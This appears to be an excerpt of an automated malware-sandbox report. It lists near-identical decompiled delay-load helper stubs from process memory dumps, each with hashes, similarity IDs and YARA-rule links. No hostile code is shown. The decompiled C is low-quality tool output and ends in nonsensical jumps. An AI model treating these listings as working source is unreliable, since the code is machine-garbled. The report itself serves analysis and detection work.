Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 98790fa3faaa0afb360ffe0bce4f9de5d5279967e972814e5140f2656b7927e3
Instruction ID: 489fb53ded57e3c57187626c8067ea8d9b958ef431e421df1d62c9e5e05cb662
Opcode Fuzzy Hash: 98790fa3faaa0afb360ffe0bce4f9de5d5279967e972814e5140f2656b7927e3
Instruction Fuzzy Hash: C9B0129536C10AAE710C51043E07E37023CC8D0F10371C01FF40ED2040DB908C094031

Uniqueness

Uniqueness Score: -1.00%

Function 0017DC24, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017DC24() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19be64, 0x1c2178); // executed
				goto __eax;
			}

0x0017dc2e
0x0017dc36
0x0017dc3d

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DC36

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fa01229a0917e7c843a709392c836a86eeffdf485b730bf7f64a31d05f1ed361
Instruction ID: 0836dcdc36a7cb31037e0a42bba59fa78998227519c80512cc89c502a3030af4
Opcode Fuzzy Hash: fa01229a0917e7c843a709392c836a86eeffdf485b730bf7f64a31d05f1ed361
Instruction Fuzzy Hash: D2B0129526C209BE310C21007F02D36023CC9D0F10331C61EF10EF0040D780AC455031

Uniqueness

Uniqueness Score: -1.00%

Function 0017DC53, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017DC53() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19be64, 0x1c217c); // executed
				goto __eax;
			}

0x0017dc2e
0x0017dc36
0x0017dc3d

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DC36

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2adf57b55337fee6b7ba967134b7e560d82f8d7d90e21b1b51da804f3a4bae65
Instruction ID: 843c40f4c067ea089920bfd93127933817308508d9c73bf6a7899bd9e42aeda5
Opcode Fuzzy Hash: 2adf57b55337fee6b7ba967134b7e560d82f8d7d90e21b1b51da804f3a4bae65
Instruction Fuzzy Hash: 38B0129526C205AE310C61047E02E36023CC8D4F10331C51EF50EE0040D780AC054031

Uniqueness

Uniqueness Score: -1.00%

Function 0017DC5D, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017DC5D() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19be64, 0x1c2170); // executed
				goto __eax;
			}

0x0017dc2e
0x0017dc36
0x0017dc3d

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DC36

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 165794378d8bf71ac822860032455475535cc29c2450952129d381cf433995ab
Instruction ID: 03cc87c6e8a25e824e94e169c62cbaec65b0baa074a1b78b41f1665713294abc
Opcode Fuzzy Hash: 165794378d8bf71ac822860032455475535cc29c2450952129d381cf433995ab
Instruction Fuzzy Hash: BFB0129527C205AE310C61047E02E36023CC8D0F10330C51FF10EE0040DB80AC054031

Uniqueness

Uniqueness Score: -1.00%

Function 0017D8D9, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017D8D9() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bdc4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017d89e
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 33a3aa6bc022d08360c7402a73a2f8339206e8bc1a6a6acb455bcb306f45d215
Instruction ID: 1f37339f98ea02a29f9e4f53e8f92c4e7b886aa9c8a70451d0ecbf7987edcf10
Opcode Fuzzy Hash: 33a3aa6bc022d08360c7402a73a2f8339206e8bc1a6a6acb455bcb306f45d215
Instruction Fuzzy Hash: D2A001A6AAD50ABC760C6291BE96D3A067CCCD5B65371C91EF44FA41C1AB80684A5832

Uniqueness

Uniqueness Score: -1.00%

Function 0017D91F, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017D91F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bdc4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017d89e
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d99ebe19136ce4486d0389958198f63bc095c5d3e10694075c4fb83c1ae482ff
Instruction ID: 1f37339f98ea02a29f9e4f53e8f92c4e7b886aa9c8a70451d0ecbf7987edcf10
Opcode Fuzzy Hash: d99ebe19136ce4486d0389958198f63bc095c5d3e10694075c4fb83c1ae482ff
Instruction Fuzzy Hash: D2A001A6AAD50ABC760C6291BE96D3A067CCCD5B65371C91EF44FA41C1AB80684A5832

Uniqueness

Uniqueness Score: -1.00%

Function 0017D93D, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017D93D() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bdc4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017d89e
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4031da5d1747bf97342eb08440f5014e97d362cb1e5d8c939227eb6cfa177d5b
Instruction ID: 1f37339f98ea02a29f9e4f53e8f92c4e7b886aa9c8a70451d0ecbf7987edcf10
Opcode Fuzzy Hash: 4031da5d1747bf97342eb08440f5014e97d362cb1e5d8c939227eb6cfa177d5b
Instruction Fuzzy Hash: D2A001A6AAD50ABC760C6291BE96D3A067CCCD5B65371C91EF44FA41C1AB80684A5832

Uniqueness

Uniqueness Score: -1.00%

Function 0017D951, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017D951() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bdc4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017d89e
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 917c5701df173edc8e0a1b3f75229be24e6a7ffaf2f243eb344778193edd66b1
Instruction ID: 1f37339f98ea02a29f9e4f53e8f92c4e7b886aa9c8a70451d0ecbf7987edcf10
Opcode Fuzzy Hash: 917c5701df173edc8e0a1b3f75229be24e6a7ffaf2f243eb344778193edd66b1
Instruction Fuzzy Hash: D2A001A6AAD50ABC760C6291BE96D3A067CCCD5B65371C91EF44FA41C1AB80684A5832

Uniqueness

Uniqueness Score: -1.00%

Function 0017D95B, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017D95B() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bdc4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017d89e
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: db1214e65d0ddfc480f0021ec1a4a9f6a7352df81a42863b82a66feaf8adf152
Instruction ID: 1f37339f98ea02a29f9e4f53e8f92c4e7b886aa9c8a70451d0ecbf7987edcf10
Opcode Fuzzy Hash: db1214e65d0ddfc480f0021ec1a4a9f6a7352df81a42863b82a66feaf8adf152
Instruction Fuzzy Hash: D2A001A6AAD50ABC760C6291BE96D3A067CCCD5B65371C91EF44FA41C1AB80684A5832

Uniqueness

Uniqueness Score: -1.00%

Function 0017D979, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017D979() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bdc4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017d89e
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fc87f868d6dd64876ff0f734d143011170f7f61abfc1af1a3ecd48ce954bcf0a
Instruction ID: 1f37339f98ea02a29f9e4f53e8f92c4e7b886aa9c8a70451d0ecbf7987edcf10
Opcode Fuzzy Hash: fc87f868d6dd64876ff0f734d143011170f7f61abfc1af1a3ecd48ce954bcf0a
Instruction Fuzzy Hash: D2A001A6AAD50ABC760C6291BE96D3A067CCCD5B65371C91EF44FA41C1AB80684A5832

Uniqueness

Uniqueness Score: -1.00%

Function 0017D965, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017D965() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bdc4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017d89e
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c046e3bb48f79392152c162e3f196e78941158c7163a247a9bff1256e3fe6575
Instruction ID: 1f37339f98ea02a29f9e4f53e8f92c4e7b886aa9c8a70451d0ecbf7987edcf10
Opcode Fuzzy Hash: c046e3bb48f79392152c162e3f196e78941158c7163a247a9bff1256e3fe6575
Instruction Fuzzy Hash: D2A001A6AAD50ABC760C6291BE96D3A067CCCD5B65371C91EF44FA41C1AB80684A5832

Uniqueness

Uniqueness Score: -1.00%

Function 0017D96F, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017D96F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bdc4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017d89e
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 302548d2ca0902116250e9d492b8691eb86db5b21f00f00df7dab1ccbf98ef47
Instruction ID: 1f37339f98ea02a29f9e4f53e8f92c4e7b886aa9c8a70451d0ecbf7987edcf10
Opcode Fuzzy Hash: 302548d2ca0902116250e9d492b8691eb86db5b21f00f00df7dab1ccbf98ef47
Instruction Fuzzy Hash: D2A001A6AAD50ABC760C6291BE96D3A067CCCD5B65371C91EF44FA41C1AB80684A5832

Uniqueness

Uniqueness Score: -1.00%

Function 0017D997, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017D997() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bdc4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017d89e
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4d8edde666bfee3dba6552371b4885607a67c5fbce1b165205fc138e3b7211a3
Instruction ID: 1f37339f98ea02a29f9e4f53e8f92c4e7b886aa9c8a70451d0ecbf7987edcf10
Opcode Fuzzy Hash: 4d8edde666bfee3dba6552371b4885607a67c5fbce1b165205fc138e3b7211a3
Instruction Fuzzy Hash: D2A001A6AAD50ABC760C6291BE96D3A067CCCD5B65371C91EF44FA41C1AB80684A5832

Uniqueness

Uniqueness Score: -1.00%

Function 0017D983, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017D983() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bdc4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017d89e
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c16161c70767b50480496581a552524ce0f6630ca1bc51178aed9c04120fcb3d
Instruction ID: 1f37339f98ea02a29f9e4f53e8f92c4e7b886aa9c8a70451d0ecbf7987edcf10
Opcode Fuzzy Hash: c16161c70767b50480496581a552524ce0f6630ca1bc51178aed9c04120fcb3d
Instruction Fuzzy Hash: D2A001A6AAD50ABC760C6291BE96D3A067CCCD5B65371C91EF44FA41C1AB80684A5832

Uniqueness

Uniqueness Score: -1.00%

Function 0017D98D, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017D98D() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bdc4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017d89e
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 896e05f5f85bbe5648d9872b13b5702bcc1de7d5b8bdf79bcfb1a56c839abd27
Instruction ID: 1f37339f98ea02a29f9e4f53e8f92c4e7b886aa9c8a70451d0ecbf7987edcf10
Opcode Fuzzy Hash: 896e05f5f85bbe5648d9872b13b5702bcc1de7d5b8bdf79bcfb1a56c839abd27
Instruction Fuzzy Hash: D2A001A6AAD50ABC760C6291BE96D3A067CCCD5B65371C91EF44FA41C1AB80684A5832

Uniqueness

Uniqueness Score: -1.00%

Function 0017DAA5, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017DAA5() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bde4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017daad
0x0017dab2
0x0017dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DAB2

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b330bb0f1fae1a1ef510e4a7ec68bb98a20ba6ee59b60763aa58fdc5f96fdaa5
Instruction ID: 8eadb3afca627b72eb87bcbe449aa0fca05b3e8954af057057a87b0322723f13
Opcode Fuzzy Hash: b330bb0f1fae1a1ef510e4a7ec68bb98a20ba6ee59b60763aa58fdc5f96fdaa5
Instruction Fuzzy Hash: 4EA0029526D5057C754C7151BE56D3A027CD8D0B15371C51EF40F95045574459455471

Uniqueness

Uniqueness Score: -1.00%

Function 0017DAC0, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017DAC0() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bde4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017daad
0x0017dab2
0x0017dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DAB2

